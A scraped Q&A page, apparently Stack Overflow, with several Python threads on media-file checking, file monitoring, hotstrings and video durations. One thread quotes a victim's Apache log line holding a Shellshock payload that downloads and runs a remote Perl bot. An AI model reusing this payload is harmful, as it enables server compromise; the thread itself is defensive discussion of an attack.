Verify mediafiles with libVLC and Python

I'm trying to find out whether a media file "could" be played back in VLC using LibVLC-Python.
In my Python script I walk recursively through a directory (containing media and non-media files as well as images etc.), opening and playing one file after another in VLC. Then I try to determine whether each file can actually be played, using the VLC functions will_play() and get_state(). This is highly unreliable, though, and the script has to pause so that the file can load fully. If an audio file is very short, for example, and the script pauses too long, the file will not be detected as "playable" because its playback has already stopped. If the script runs across a JPG it hangs, and sometimes text and PDF files are labeled "will_play" :-( So far I have not been able to use VLC classes such as MediaTrackInfo().
Is there a way to just parse each file and determine, e.g. by its codec, whether VLC could play it? I just want to sort through huge directories and copy out "real" media files (audio and video) that are not corrupted.
Here's my original script:
import os, sys, inspect, time
vlcpfad = r"C:\Program Files (x86)\VideoLAN\VLC"
if vlcpfad not in sys.path:
    sys.path.append(vlcpfad)
import vlc
# Get name and path of the script
pfadkomplett = os.path.realpath(os.path.abspath(inspect.getfile(inspect.currentframe())))
pfad = os.path.split(pfadkomplett)[0]
skriptname = os.path.split(pfadkomplett)[1]
# walk path
for pfad, unterordner, dateien in os.walk(pfad):
    for dateiname in dateien:
        # skip script itself
        if dateiname == skriptname: continue
        dateipfad = os.path.join(pfad, dateiname)
        p = vlc.MediaPlayer(dateipfad)
        p.audio_toggle_mute()
        p.play()
        # Wait a bit, so vlc can start playback
        time.sleep(0.2)
        while str(p.get_state()) == "State.Opening":
            time.sleep(0.1)
        print(dateipfad + ": " + str(p.will_play()))
        p.stop()
        del p

One way is to check whether the media is OK before playing it:
[...]
p = vlc.MediaPlayer(dateipfad)
media = p.get_media()
media.parse()  # get media info
if media.get_duration():
    pass  # media is OK
else:
    pass  # media NOK
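
The same parse-then-check idea can be applied to a whole directory tree without starting playback. This is a minimal sketch, assuming python-vlc is installed: `duration_ms_via_vlc` and `find_playable` are hypothetical helper names, and treating a positive duration as "playable" is only a heuristic, not a guarantee that VLC can decode the file.

```python
import os


def duration_ms_via_vlc(path):
    """Parse a file with libVLC (no playback) and return its duration in ms."""
    import vlc  # imported lazily so the walker below can be used with another probe

    media = vlc.Media(path)
    media.parse()  # blocking parse; deprecated in newer libVLC releases
    return media.get_duration()


def find_playable(root, probe=duration_ms_via_vlc):
    """Yield paths under root for which probe() reports a positive duration."""
    for folder, _subfolders, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(folder, name)
            try:
                duration = probe(path)
            except Exception:
                continue  # a probe failure is treated as "not playable"
            if duration and duration > 0:
                yield path
```

Passing the probe as a parameter is a design choice for this sketch: it lets the duration check be replaced by a stricter one (for example, one that also inspects tracks) without touching the directory walk.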

Related

python: monitor updates in /proc/mydev file

I wrote a kernel module that writes in /proc/mydev to notify the python program in userspace. I want to trigger a function in the python program whenever there is an update of data in /proc/mydev from the kernel module. What is the best way to listen for an update here? I am thinking about using "watchdog" (https://pythonhosted.org/watchdog/). Is there a better way for this?

This is an easy and efficient way:
import os
from time import sleep
from datetime import datetime
def my_function(_time):
    print("file modified, time: " + datetime.fromtimestamp(_time).strftime("%H:%M:%S"))
if __name__ == "__main__":
    _time = 0
    while True:
        last_modified_time = os.stat("/proc/mydev").st_mtime
        if last_modified_time > _time:
            my_function(last_modified_time)
            _time = last_modified_time
        sleep(1)  # prevent high cpu usage
Result:
file modified, time: 11:44:09
file modified, time: 11:46:15
file modified, time: 11:46:24
The while loop guarantees that the program keeps listening to changes forever.
You can set the interval by changing the sleep time. Low sleep time causes high CPU usage.

import os
import select
# get the file descriptor for the proc file
fd = os.open("/proc/mydev", os.O_RDONLY)
# create a polling object to monitor the file for updates
poller = select.poll()
poller.register(fd, select.POLLIN)
# create a loop to monitor the file for updates
while True:
    events = poller.poll(10000)
    if len(events) > 0:
        # read the contents of the file if updated
        print(os.read(fd, 1024))

sudo pip install inotify
Example
Code for monitoring a simple, flat path (see “Recursive Watching” for watching a hierarchical structure):
import inotify.adapters
def _main():
    i = inotify.adapters.Inotify()
    i.add_watch('/tmp')
    with open('/tmp/test_file', 'w'):
        pass
    for event in i.event_gen(yield_nones=False):
        (_, type_names, path, filename) = event
        print("PATH=[{}] FILENAME=[{}] EVENT_TYPES={}".format(
              path, filename, type_names))
if __name__ == '__main__':
    _main()
Expected output:
PATH=[/tmp] FILENAME=[test_file] EVENT_TYPES=['IN_MODIFY']
PATH=[/tmp] FILENAME=[test_file] EVENT_TYPES=['IN_OPEN']
PATH=[/tmp] FILENAME=[test_file] EVENT_TYPES=['IN_CLOSE_WRITE']

I'm not sure if this would work for your situation, since it assumes that you want to watch a folder, but this program watches one file at a time until its contents change, and then main() repeats:
import os
import time
def main():
    contents = os.listdir("/proc/mydev")
    for file in contents:
        with open("/proc/mydev/" + file, "r") as f:
            init = f.read()
        different = False
        while not different:
            with open("/proc/mydev/" + file, "r") as f:
                check = f.read()
            if init != check:
                different = True
            else:
                time.sleep(1)
        # Write what you would want to happen if a change occurred here...
while True:
    main()
You could then write what you would want to happen at the marked comment, as main() would then repeat.
Also, this may contain errors, since I rushed this.
Hope this at least helps!

You can't do this efficiently without modifying your kernel driver.
Instead of using procfs, have it register a new character device under /dev, and write that driver to make new content available to read from that device only when new content has in fact come in from the underlying hardware, such that the application layer can issue a blocking read and have it return only when new content exists.
A good example to work from (which also has plenty of native Python clients) is the evdev devices in the input core.
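
From the Python side, the blocking-read design could look roughly like the sketch below. It assumes the modified driver exposes a character device; the path `/dev/mydev` in the comment and the helper name `watch_device` are hypothetical.

```python
import os


def watch_device(fd, on_update, chunk_size=1024):
    """Call on_update(data) for every chunk read from fd.

    os.read() blocks until data is available, so no polling interval
    or sleep is needed. An empty read means the other end was closed.
    """
    while True:
        data = os.read(fd, chunk_size)
        if not data:
            break
        on_update(data)


# Usage, assuming the driver registers a device node at /dev/mydev:
#   fd = os.open("/dev/mydev", os.O_RDONLY)
#   try:
#       watch_device(fd, lambda data: print("update:", data))
#   finally:
#       os.close(fd)
```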

How to program hotstrings in python like in autohotkey

I want to make hotstrings in python that converts one word when typed into another after some processing, since AHK is very limiting when it comes to determining which word to type. Right now, I am using a hotstring in ahk that runs code on the command line that runs a python script with the word that I typed as arguments. Then I use pyautogui to type the word. However, this is very slow and does not work when typing at speed. I'm looking for a way to do this all with python and without ahk, but I have not found a way to do hotstrings in python. For example, every time I type the word "test" it replaces it with "testing." Thanks for your help. I'm running the latest version of Python and Windows 10 if that is useful to anyone by the way.

(if you want to process it as each letter is typed(t,te,tes,test), you should edit your question)
I call my SymPy functions using ahk hotkeys. I register the python script as a COM server and load it using ahk.
I do not notice any latency.
you'll need pywin32, but don't download using pip install pywin32
download from https://github.com/mhammond/pywin32/releases
OR ELSE IT WON'T WORK for AutoHotkeyU64.exe, it will only work for AutoHotkeyU32.exe.
make sure to download amd64, (I downloaded pywin32-300.win-amd64-py3.8.exe)
here's why: how to register a 64bit python COM server
toUppercase COM server.py
class BasicServer:
    # list of all method names exposed to COM
    _public_methods_ = ["toUppercase"]
    @staticmethod
    def toUppercase(string):
        return string.upper()
if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print('Error: need to supply arg ("--register" or "--unregister")')
        sys.exit(1)
    else:
        import win32com.server.register
        import win32com.server.exception
        # this server's CLSID
        # NEVER copy the following ID
        # Use "print(pythoncom.CreateGuid())" to make a new one.
        myClsid="{C70F3BF7-2947-4F87-B31E-9F5B8B13D24F}"
        # this server's (user-friendly) program ID
        myProgID="Python.stringUppercaser"
        import ctypes
        def make_sure_is_admin():
            try:
                if ctypes.windll.shell32.IsUserAnAdmin():
                    return
            except:
                pass
            exit("YOU MUST RUN THIS AS ADMIN")
        if sys.argv[1] == "--register":
            make_sure_is_admin()
            import pythoncom
            import os.path
            realPath = os.path.realpath(__file__)
            dirName = os.path.dirname(realPath)
            nameOfThisFile = os.path.basename(realPath)
            nameNoExt = os.path.splitext(nameOfThisFile)[0]
            # stuff will be written here
            # HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\${myClsid}
            # HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C70F3BF7-2947-4F87-B31E-9F5B8B13D24F}
            # and here
            # HKEY_LOCAL_MACHINE\SOFTWARE\Classes\${myProgID}
            # HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.stringUppercaser
            win32com.server.register.RegisterServer(
                clsid=myClsid,
                # I guess this is {fileNameNoExt}.{className}
                pythonInstString=nameNoExt + ".BasicServer", #toUppercase COM server.BasicServer
                progID=myProgID,
                # optional description
                desc="return uppercased string",
                #we only want the registry key LocalServer32
                #we DO NOT WANT InProcServer32: pythoncom39.dll, NO NO NO
                clsctx=pythoncom.CLSCTX_LOCAL_SERVER,
                #this is needed if this file isn't in PYTHONPATH: it tells regedit which directory this file is located
                #this will write HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C70F3BF7-2947-4F87-B31E-9F5B8B13D24F}\PythonCOMPath : dirName
                addnPath=dirName,
            )
            print("Registered COM server.")
            # don't use UseCommandLine(), as it will write InProcServer32: pythoncom39.dll
            # win32com.server.register.UseCommandLine(BasicServer)
        elif sys.argv[1] == "--unregister":
            make_sure_is_admin()
            print("Starting to unregister...")
            win32com.server.register.UnregisterServer(myClsid, myProgID)
            print("Unregistered COM server.")
        else:
            print("Error: arg not recognized")
you first need to register the python COM server:
first, get your own CLSID: just use a python shell.
import pythoncom
print(pythoncom.CreateGuid())
then, set myClsid to that output
to register:
python "toUppercase COM server.py" --register
to unregister:
python "toUppercase COM server.py" --unregister
hotstring python toUppercase.ahk
#NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases.
#SingleInstance, force
SendMode Input ; Recommended for new scripts due to its superior speed and reliability.
SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.
SetBatchLines, -1
#KeyHistory 0
ListLines Off
#Persistent
#MaxThreadsPerHotkey 4
pythonComServer:=ComObjCreate("Python.stringUppercaser")
; OR
; pythonComServer:=ComObjCreate("{C70F3BF7-2947-4F87-B31E-9F5B8B13D24F}") ;use your own CLSID
; * do not wait for string to end
; C case sensitive
:*:hello world::
savedHotstring:=A_ThisHotkey
;theActualHotstring=savedHotstring[second colon:end of string]
theActualHotstring:=SubStr(savedHotstring, InStr(savedHotstring, ":",, 2) + 1)
send, % pythonComServer.toUppercase(theActualHotstring)
return
f3::Exitapp
you can test the speed of hotstring hello world, it's very fast for me.
Edit def toUppercase(string): to your liking
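
For the pure-Python route the question asks about, the matching logic itself is small. The sketch below covers only that part: a keyboard hook (not shown) would have to feed it each typed character and then send the returned number of backspaces followed by the replacement text. `HotstringBuffer` and `feed` are hypothetical names for illustration, not part of any library.

```python
class HotstringBuffer:
    """Track recently typed characters and report completed triggers."""

    def __init__(self, replacements):
        # Maps trigger text to a replacement string or a callable(trigger) -> str
        self.replacements = dict(replacements)
        self.max_len = max((len(k) for k in self.replacements), default=0)
        self.buffer = ""

    def feed(self, char):
        """Add one typed character; return (backspaces, text) or None."""
        if char == "\b":
            self.buffer = self.buffer[:-1]
            return None
        # Keep only as many characters as the longest trigger needs
        self.buffer = (self.buffer + char)[-self.max_len:] if self.max_len else ""
        for trigger, replacement in self.replacements.items():
            if self.buffer.endswith(trigger):
                self.buffer = ""
                text = replacement(trigger) if callable(replacement) else replacement
                return len(trigger), text
        return None
```

Like the `*` option in the AutoHotkey script above, this fires as soon as the trigger is complete rather than waiting for an ending character, so with `{"test": "testing"}` the replacement happens the moment the final "t" is typed.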

Subprocess.Popen only runs second time

I have a boot controller which runs a boot.py file contained in the folder of each tool I am trying to deploy. I want my boot controller to run all of these boot files simultaneously. The config file has the tool names and the desired versions, which are used to generate the path to each boot.py.
def run_boot():
    config_file = get_config_file()
    parse_config_file.init(config_file)
    tools = parse_config_file.get_tools_to_deploy()
    #tools is now a list of tool names
    top_dir = os.getcwd()
    for tool in tools:
        ver = parse_config_file.get_tool_version(tool).strip()
        boot_file_path = "{0}\\Deploy\\{1}\\{2}".format(os.getcwd(),tool,ver)
        try:
            subprocess.Popen('boot.py', shell=True, cwd=boot_file_path)
        except:
            print ("{0} failed to open".format(tool))
        print(tool, boot_file_path)
        os.chdir(top_dir)
The first time I run this, the print(tool, boot_file_path) executes but the processes do not start. The second time it is run, the processes do open. I cannot find a reason for this.
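
One thing that may be worth trying (a sketch, not a confirmed diagnosis of the behavior described) is to start each boot.py with the current interpreter explicitly, rather than relying on shell=True and the .py file association, and to keep the Popen handles so that failures become visible. `launch_boot_scripts` and its parameters are hypothetical names.

```python
import os
import subprocess
import sys


def launch_boot_scripts(boot_dirs, script_name="boot.py"):
    """Start script_name in every directory at once; return {dir: exit code}."""
    processes = {}
    for boot_dir in boot_dirs:
        script = os.path.join(boot_dir, script_name)
        if not os.path.isfile(script):
            print("{0} not found".format(script))
            continue
        # sys.executable avoids depending on the shell and on file associations
        processes[boot_dir] = subprocess.Popen(
            [sys.executable, script_name], cwd=boot_dir
        )
    # All children are running now; wait for each one and collect its exit code
    return {boot_dir: proc.wait() for boot_dir, proc in processes.items()}
```

Because every process is started before any of them is waited on, the scripts still run simultaneously; the returned exit codes show which tools failed to boot.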

A python script to monitor a directory for new files

Similar questions have been asked but they either did not work for me or I failed to understand the answers.
I run Apache2 webserver and host a few petty personal sites. I am being cyberstalked, or someone is attempting to hack me.
The Apache2 access log shows
195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"
which is clearly attempting (over and over again in my logs) to force my server to download 'cox.pl' then run 'cox.pl' then remove 'cox.pl'.
I really want to know what is in cox.pl which could be a modified version of Cox-Data-Usage which is there on github.
I would like a script that will constantly monitor my /tmp folder, and when a new file is added then copy that file to another directory for me to see what it is doing, or attempting to do at least.
I know I could deny access etc. but I want to find out what these hackers are trying to do and see if I can gather intel about them.

The script in question can be easily downloaded, it contains ShellBOT by: devil__ so... guess ;-)
You could use tutorial_notifier.py from pyinotify, but there's no need for this particular case. Just do
curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt
to check the script.
It looks like a good suite of hacks for Linux 2.4.17 - 2.6.17 and maybe BSD*, not that harmless to me, IRC related. It has nothing to do with Cox-Data-Usage.

The solution to the question wouldn't lie in a python script, this is more of a security issue for the likes of Fail2ban or similar to handle, but there is a way to monitor a directory for changes using Python Watchdog. (pip install watchdog)
Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s - %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')
    path = sys.argv[1] if len(sys.argv) > 1 else '.'
    event_handler = LoggingEventHandler()
    observer = Observer()
    observer.schedule(event_handler, path, recursive=True)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()
This will log all changes, (it can be configured for just file creation).
If you want to rename or move new files, you first need to know whether the file is free; otherwise the modification will fail, e.g. because the file has not finished downloading or being created. It also means that a call to the file can arrive before you have moved or renamed it programmatically. That's why this isn't a solution.

I have two solutions.
Solution 1 (CPU usage: 27.9%, approx. 30%):
import os
path_to_watch = "your/path"
print('Your folder path is "' + path_to_watch + '"')
before = dict([(f, None) for f in os.listdir(path_to_watch)])
while 1:
    after = dict([(f, None) for f in os.listdir(path_to_watch)])
    added = [f for f in after if f not in before]
    if added:
        print("Added: ", ", ".join(added))
        break
    else:
        before = after
I have edited the code; the original is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
The original code was written for Python 2.x, so it needs to be converted to Python 3.
NOTE: whenever a file is added to the path, the script prints the text and breaks; if no files are added, it keeps running.
Solution 2 (CPU usage: 23.4 approx=20%)
import os
path=r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon'
b=os.listdir(path)
path_len_org=len(b)
def file_check():
    while 1:
        b=os.listdir(path)
        path_len_final=len(b)
        if path_len_org<path_len_final:
            return "A file is added"
        elif path_len_org>path_len_final:
            return "A file is removed"
        else:
            pass
file_check()
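
Both loops above spin without pausing, which is where the CPU usage comes from. The sketch below is a variant that sleeps between scans and copies each new file to another directory, as the question asks. The helper names `copy_new_files` and `watch`, and the 0.5 second interval, are assumptions for illustration.

```python
import os
import shutil
import time


def copy_new_files(watch_dir, dest_dir, seen):
    """Copy regular files not yet in `seen` to dest_dir; return their names."""
    copied = []
    for name in sorted(os.listdir(watch_dir)):
        path = os.path.join(watch_dir, name)
        if name in seen or not os.path.isfile(path):
            continue
        seen.add(name)
        try:
            shutil.copy2(path, os.path.join(dest_dir, name))
            copied.append(name)
        except OSError:
            pass  # the file vanished or is unreadable; skip it
    return copied


def watch(watch_dir, dest_dir, interval=0.5):
    """Poll forever; sleeping between scans keeps CPU usage low."""
    os.makedirs(dest_dir, exist_ok=True)
    seen = set(os.listdir(watch_dir))  # ignore files that already exist
    while True:
        for name in copy_new_files(watch_dir, dest_dir, seen):
            print("Copied:", name)
        time.sleep(interval)
```

A file that is created and deleted again within one interval is missed by any polling approach, which matters for a script that downloads, runs and removes its payload in quick succession.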

Get total length of videos in a particular directory in python

I have downloaded a bunch of videos from coursera.org and have them stored in one particular folder. There are many individual videos in a particular folder (Coursera breaks a lecture into multiple short videos). I would like to have a python script which gives the combined length of all the videos in a particular directory. The video files are .mp4 format.

First, install the ffprobe command (it's part of FFmpeg) with
sudo apt install ffmpeg
then use subprocess.run() to run this bash command:
ffprobe -v error -show_entries format=duration -of default=noprint_wrappers=1:nokey=1 -- <filename>
(which I got from http://trac.ffmpeg.org/wiki/FFprobeTips#Formatcontainerduration), like this:
from pathlib import Path
import subprocess
def video_length_seconds(filename):
    result = subprocess.run(
        [
            "ffprobe",
            "-v",
            "error",
            "-show_entries",
            "format=duration",
            "-of",
            "default=noprint_wrappers=1:nokey=1",
            "--",
            filename,
        ],
        capture_output=True,
        text=True,
    )
    try:
        return float(result.stdout)
    except ValueError:
        raise ValueError(result.stderr.rstrip("\n"))
# a single video
video_length_seconds('your_video.webm')
# all mp4 files in the current directory (seconds)
print(sum(video_length_seconds(f) for f in Path(".").glob("*.mp4")))
# all mp4 files in the current directory and all its subdirectories
# `rglob` instead of `glob`
print(sum(video_length_seconds(f) for f in Path(".").rglob("*.mp4")))
# all files in the current directory
print(sum(video_length_seconds(f) for f in Path(".").iterdir() if f.is_file()))
This code requires Python 3.7+ because that's when text= and capture_output= were added to subprocess.run. If you're using an older Python version, check the edit history of this answer.

Download MediaInfo and install it (don't install the bundled adware)
Go to the MediaInfo source downloads and in the "Source code, All included" row, choose the link next to "libmediainfo"
Find MediaInfoDLL3.py in the downloaded archive and extract it anywhere.
Example location: libmediainfo_0.7.62_AllInclusive.7z\MediaInfoLib\Source\MediaInfoDLL\MediaInfoDLL3.py
Now make a script for testing (sources below) in the same directory.
Execute the script.
MediaInfo works on POSIX too. The only difference is that a .so (shared object) is loaded instead of a DLL.
Test script (Python 3!)
import os
os.chdir(os.environ["PROGRAMFILES"] + "\\mediainfo")
from MediaInfoDLL3 import MediaInfo, Stream
MI = MediaInfo()
def get_lengths_in_milliseconds_of_directory(prefix):
    for f in os.listdir(prefix):
        MI.Open(prefix + f)
        duration_string = MI.Get(Stream.Video, 0, "Duration")
        try:
            duration = int(duration_string)
            yield duration
            print("{} is {} milliseconds long".format(f, duration))
        except ValueError:
            print("{} ain't no media file!".format(f))
        MI.Close()
print(sum(get_lengths_in_milliseconds_of_directory(os.environ["windir"] + "\\Performance\\WinSAT\\"
)), "milliseconds of content in total")

In addition to Janus Troelsen's answer above, I would like to point out a small problem I encountered when implementing it. I followed his instructions one by one but got different results on Windows (7) and Linux (Ubuntu). His instructions worked perfectly under Linux, but I had to do a small hack to get it to work on Windows. I am using a 32-bit Python 2.7.2 interpreter on Windows, so I used MediaInfoDLL.py. That was not enough to get it to work, though; I was receiving this error:
"WindowsError: [Error 193] %1 is not a valid Win32 application".
This meant that I was somehow using a resource that was not 32-bit, and it had to be the DLL that MediaInfoDLL.py was loading. If you look at the MediaInfo installation directory you will see 3 DLLs; MediaInfo.dll is 64-bit while MediaInfo_i386.dll is 32-bit. MediaInfo_i386.dll is the one I had to use because of my Python setup. I went to MediaInfoDLL.py (which I had already included in my project) and changed this line:
MediaInfoDLL_Handler = windll.MediaInfo
to
MediaInfoDLL_Handler = WinDLL(r"C:\Program Files (x86)\MediaInfo\MediaInfo_i386.dll")
I didn't have to change anything for it to work on Linux.

Nowadays pymediainfo is available, so Janus Troelsen's answer could be simplified.
You need to install MediaInfo and run pip install pymediainfo. Then the following code prints the total length (in milliseconds) of all video files in a directory:
import os
from pymediainfo import MediaInfo
def get_track_len(file_path):
    media_info = MediaInfo.parse(file_path)
    for track in media_info.tracks:
        # skip video tracks that report no duration
        if track.track_type == "Video" and track.duration:
            return int(float(track.duration))
    return 0
video_dir = 'directory with video files'
# os.listdir() returns bare names, so join them with the directory
print(sum(get_track_len(os.path.join(video_dir, f)) for f in os.listdir(video_dir)))

This link shows how to get the length of a video file https://stackoverflow.com/a/3844467/735204
import subprocess
def getLength(filename):
    # universal_newlines=True makes the output text rather than bytes (Python 3)
    result = subprocess.Popen(["ffprobe", filename],
        stdout = subprocess.PIPE, stderr = subprocess.STDOUT,
        universal_newlines = True)
    return [x for x in result.stdout.readlines() if "Duration" in x]
If you're using that function, you can then wrap it up with something like
import os
for f in os.listdir('.'):
    print("%s: %s" % (f, getLength(f)))

Here's my take. I did this on Windows. I took the answer from Federico above, and changed the python program a little bit to traverse a tree of folders with video files. So you need to go above to see Federico's answer, to install MediaInfo and to pip install pymediainfo, and then write this program, summarize.py:
import os
import sys
from pymediainfo import MediaInfo
number_of_video_files = 0
def get_alternate_len(media_info):
    myJson = media_info.to_data()
    myArray = myJson['tracks']
    for track in myArray:
        if track['track_type'] == 'General' or track['track_type'] == 'Video':
            if 'duration' in track:
                return int(track['duration'] / 1000)
    return 0
def get_track_len(file_path):
    global number_of_video_files
    media_info = MediaInfo.parse(file_path)
    for track in media_info.tracks:
        if track.track_type == "Video":
            number_of_video_files += 1
            if type(track.duration) == int:
                len_in_sec = int(track.duration / 1000)
            elif type(track.duration) == str:
                len_in_sec = int(float(track.duration) / 1000)
            else:
                len_in_sec = get_alternate_len(media_info)
            if len_in_sec == 0:
                print("File path = " + file_path + ", problem in type of track.duration")
            return len_in_sec
    return 0
sum_in_secs = 0.0
os.chdir(sys.argv[1])
for root, dirs, files in os.walk("."):
    for name in files:
        sum_in_secs += get_track_len(os.path.join(root, name))
hours = int(sum_in_secs / 3600)
remain = sum_in_secs - hours * 3600
minutes = int(remain / 60)
seconds = remain - minutes * 60
print("Directory: " + sys.argv[1])
print("Total number of video files is " + str(number_of_video_files))
print("Length: %d:%02d:%02d" % (hours, minutes, seconds))
Run it: python summarize.py <DirPath>
Have fun. I found I have about 1800 hours of videos waiting for me to have some free time. Yeah sure
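
The hours/minutes/seconds arithmetic in summarize.py can also be written with divmod. A small sketch; `format_duration` is a hypothetical helper name:

```python
def format_duration(total_seconds):
    """Return total_seconds as H:MM:SS (hours are not wrapped into days)."""
    minutes, seconds = divmod(int(total_seconds), 60)
    hours, minutes = divmod(minutes, 60)
    return "%d:%02d:%02d" % (hours, minutes, seconds)
```

For example, 3725 seconds is 1 hour, 2 minutes and 5 seconds, so `format_duration(3725)` returns "1:02:05".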
